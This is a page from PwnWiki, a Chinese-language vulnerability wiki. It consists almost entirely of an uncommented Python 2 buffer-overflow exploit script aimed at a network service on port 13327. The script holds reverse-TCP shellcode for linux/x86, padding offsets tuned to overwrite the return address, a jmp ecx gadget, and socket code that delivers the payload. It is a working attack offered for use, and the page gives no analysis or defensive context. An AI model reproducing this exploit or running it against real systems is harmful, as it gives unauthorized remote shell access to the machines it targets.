PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
Exploit
import socket
import struct
#Script by Wulfzz (Axua)
#offset to ret addr = 4368
#offset to jmp ecx = 4198
host = "127.0.0.1"
port = 13327
#linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444
shellcode = "\xbe\xc1\x25\xda\x2c\xdd\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
shellcode +="\x12\x31\x72\x12\x83\xea\xfc\x03\xb3\x2b\x38\xd9\x02\xef\x4b"
shellcode +="\xc1\x37\x4c\xe7\x6c\xb5\xdb\xe6\xc1\xdf\x16\x68\xb2\x46\x19"
shellcode +="\x56\x78\xf8\x10\xd0\x7b\x90\xdd\x22\x7c\x61\x4a\x21\x7c\x70"
shellcode +="\xd6\xac\x9d\xc2\x80\xfe\x0c\x71\xfe\xfc\x27\x94\xcd\x83\x6a"
shellcode +="\x3e\xa0\xac\xf9\xd6\x54\x9c\xd2\x44\xcc\x6b\xcf\xda\x5d\xe5"
shellcode +="\xf1\x6a\x6a\x38\x71"
prefix= "\x11(setup sound "
padding_to_ecx = "\x41" * 4198
padding_to_ret = "\x41" * (170 - len(shellcode))
jmp_ecx = struct.pack("<I", 0x0813C51F) # jmp ecx
payload = prefix + padding_to_ecx + shellcode + padding_to_ret + jmp_ecx + "\x90" * 8 + "\x00"
#sending payload
s = socket.socket()
s.connect((host, port))
print s.recv(1024)
s.send(payload)
s.close()
print "* Payload sent."
免费、自由、人人可编辑的漏洞库--PwnWiki.com
